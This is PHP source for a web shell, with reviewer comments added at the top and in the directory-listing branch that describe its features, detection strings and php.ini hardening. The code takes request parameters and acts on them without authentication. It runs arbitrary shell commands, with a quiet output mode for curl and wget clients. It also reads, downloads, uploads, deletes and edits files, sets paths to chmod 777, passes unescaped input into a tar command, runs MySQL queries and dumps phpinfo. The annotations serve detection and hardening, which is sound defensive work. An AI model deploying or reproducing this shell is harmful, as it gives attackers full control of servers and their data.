// NOTE(review): The statements up to `return $fixedPath; }` on the next line are the tail of a
// path-normalising function whose start is outside this view (presumably cleanPath(), which the
// listing branch calls). It blanks "." and ".." segments, rejoins the remaining parts and
// guarantees a trailing slash.
// Everything after it is a request dispatcher with one branch per $_REQUEST key. No authentication
// or allow-list check appears in the visible code (TODO confirm against the unseen top of the
// file), and every branch acts directly on request-controlled values:
//   chm      chmod() of the supplied path to 0777 (Linux only)
//   phpinfo  phpinfo() output, i.e. full configuration and environment disclosure
//   dl+file  readfile() of the concatenated path; 'file' also goes unescaped into the
//            Content-disposition header, and a failed open echoes 'dl' back unescaped
//   gz       the value is interpolated into exec("cd $directory; tar czf ...") with no escaping,
//            so it is a shell-injection sink as well as a whole-directory download (Linux only)
//   f        fopen()/fpassthru() of the supplied path, served as text/plain
//   d        directory listing via opendir()/readdir(); with 'hldb' set, each file is read and
//            flagged when it contains "mysql_", "mysqli_" or "SELECT "
//   c        exec() of the supplied string; the HTML wrapper is skipped when the first four
//            characters of the User-Agent are "curl" or "wget"
//   uploadForm / file_name
//            move_uploaded_file() into the directory named by the uploadDir cookie; only
//            basename() is applied to the client-supplied file name
// Taken together this is web-shell functionality rather than application code. For detection, the
// parameter names above, the curl/wget User-Agent switch and the uploadDir cookie are the stable
// strings to look for in access logs and file scans. Restricting exec()-family functions through
// php.ini disable_functions and keeping web roots non-writable by the web-server account limits
// what a file like this can do.
$val) // Process '..' & '.' directories { if($val=="..") { $parts[$key]=""; $lastKey=$key-1; $parts[$lastKey]=""; } elseif($val==".") { $parts[$key]=""; } } reset($parts); $fixedPath=($isLinux ? "/" : ""); // Some PHP configs wont automatically create a variable on .= or will at least whine about it $firstPiece=true; foreach($parts as $val) // Assemble the path back together { if($val != "") { $fixedPath .= ($firstPiece ? '' : $slash) . $val; $firstPiece=false; } } if($fixedPath=="") // If we took out the entire path go to bottom level to avoid an error { $fixedPath=($isLinux ? $slash : ($driveLetter . ":" . $slash)); } // Make sure there is an ending slash if(substr($fixedPath,-1)!=$slash) $fixedPath .= $slash; return $fixedPath; } if(isset($_REQUEST['chm'])) { if(!$isLinux) { echo "This feature only works on Linux"; } else { echo (@chmod ($_REQUEST['chm'],0777) ? "Reassigned" : "Can't Reasign"); } } elseif(isset($_REQUEST['phpinfo'])) { phpinfo(); } elseif(isset($_REQUEST['dl'])) { if(@fopen($_REQUEST['dl'] . $_REQUEST['file'],'r')==true) { $_REQUEST['dl'] .= $_REQUEST['file']; if(substr($_REQUEST['dl'],0,1)==$slash) $fileArr=explode($slash,$_REQUEST['dl']); header('Content-disposition: attachment; filename=' . $_REQUEST['file']); header('Content-type: application/octet-stream'); readfile($_REQUEST['dl']); } else { echo $_REQUEST['dl']; } } elseif(isset($_REQUEST["gz"])) { if(!$isLinux) { echo "This feature only works on Linux"; } else { $directory=$_REQUEST["gz"]; if(substr($directory,-1)=="/") $directory=substr($directory,0,-1); $dirParts=explode($slash,$directory); $fname=$dirParts[(sizeof($dirParts)-1)]; $archive=time(); exec("cd $directory; tar czf $archive *"); $output=@file_get_contents($directory . "/" . $archive); if(!$output) header("Content-disposition: attachment; filename=ACCESS_PROBLEM"); else { header("Content-disposition: attachment; filename=$fname.tgz"); echo $output; } header('Content-type: application/octet-stream'); @unlink($directory . "/" . 
$archive); } } elseif(isset($_REQUEST['f'])) { $filename=$_REQUEST['f']; $file=fopen("$filename","rb"); header("Content-Type: text/plain"); fpassthru($file); } elseif(isset($_REQUEST['d'])) { $d=$_REQUEST['d']; echo "
";
    // NOTE(review): $d is used exactly as received; nothing visible restricts it to a base
    // directory, so the listing covers any directory the PHP process can read. With 'hldb' set,
    // the loop below calls file_get_contents() on every non-directory entry, which shows up as
    // a burst of file reads within a single request.
    if ($handle=opendir("$d"))
    {
        echo "

Listing of "; $conString=""; if($isLinux) echo "$slash"; foreach(explode($slash,cleanPath($d,$isLinux)) as $val) { $conString .= $val . $slash; echo "" . $val . "" . ($val != "" ? $slash : ''); } echo " (upload file) (DB interaction files in red)

(gzip & download folder) (chmod folder to 777) (these rarely work)
"; while ($dir=readdir($handle)) { if (is_dir("$d$slash$dir")) { if($dir != "." && $dir !="..") $dirList[]=$dir; } else { if(isset($_REQUEST["hldb"])) { $contents=file_get_contents("$d$slash$dir"); if (stripos($contents,"mysql_") || stripos($contents,"mysqli_") || stripos($contents,"SELECT ")) { $fileList[]=array('dir'=>$dir,'color'=>'red'); } else { $fileList[]=array('dir'=>$dir,'color'=>'black'); } } else { $fileList[]=array('dir'=>$dir,'color'=>'black'); } } } echo ".\n"; echo "..\n"; // Some configurations throw a notice if is_array is tried with a non-existent variable if(isset($dirList)) if(is_array($dirList)) foreach($dirList as $dir) { echo "$dir\n"; } if(isset($fileList)) if(is_array($fileList)) foreach($fileList as $dir) { echo "" . $dir['dir'] . "" . "|Download|" . "|Edit|" . "|Delete| \n"; } } else echo "opendir() failed"; closedir($handle); echo "
"; } elseif(isset($_REQUEST['c'])) { if(@ini_get('safe_mode')) { echo 'Safe mode is on, the command is by default run though escapeshellcmd() and can only run programs in safe_mod_exec_dir (' . @ini_get('safe_mode_exec_dir') . ')
'; } $USER_AGENT=strtolower(substr($_SERVER['HTTP_USER_AGENT'],0,4)); $SILENT_MODE=TRUE; if ($USER_AGENT != "curl" && $USER_AGENT != "wget") { $SILENT_MODE=FALSE; echo "

Command: " . $_REQUEST['c'] . "



"; } trim(exec($_REQUEST['c'],$return)); foreach($return as $val) { if ($SILENT_MODE) { echo htmlentities($val); } else { echo '
' . htmlentities($val) . '
'; } } } elseif(isset($_REQUEST['uploadForm']) || isset($_FILES["file_name"])) { if(isset($_FILES["file_name"])) { if ($_FILES["file_name"]["error"] > 0) { echo "Error"; } else { $target_path=$_COOKIE["uploadDir"]; if(substr($target_path,-1) != "/") $target_path .= "/"; $target_path=$target_path . basename($_FILES['file_name']['name']); if(move_uploaded_file($_FILES['file_name']['tmp_name'],$target_path)) { setcookie("uploadDir",""); echo "The file ". basename($_FILES['file_name']['name']). " has been uploaded"; } else { echo "Error copying file, likely a permission error."; } } } else { ?>
Submit this form before submitting file (will open in new window):
Upload Directory: ">


Upload file:
The following query has sucessfully executed" . htmlentities($mquery) . "

"; echo "Return Results:
"; $first=true; echo ""; while ($row=mysql_fetch_array($result,MYSQL_ASSOC)) { if($first) { echo ""; foreach($row as $key=>$val) { echo ""; } echo ""; reset($row); $first=false; } echo ""; foreach($row as $val) { echo ""; } echo ""; } echo "
$key
$val
"; mysql_free_result($result); } else { echo "Query Error: " . mysql_error(); } } elseif(isset($_REQUEST['df'])) { $_REQUEST['df'] .= $slash . $_REQUEST['file']; if(@unlink($_REQUEST['df'])) { echo "File deleted"; } else { echo "Error deleting file"; } } elseif(isset($_REQUEST['ef'])) { ?>


Server Information:
Operating System:
PHP Version:    View phpinfo()


Directory Traversal
Go to current working directory
Go to root directory
Go to any directory:

Execute MySQL Query:
host
user
password
database
query

Execute Shell Command (safe mode is ):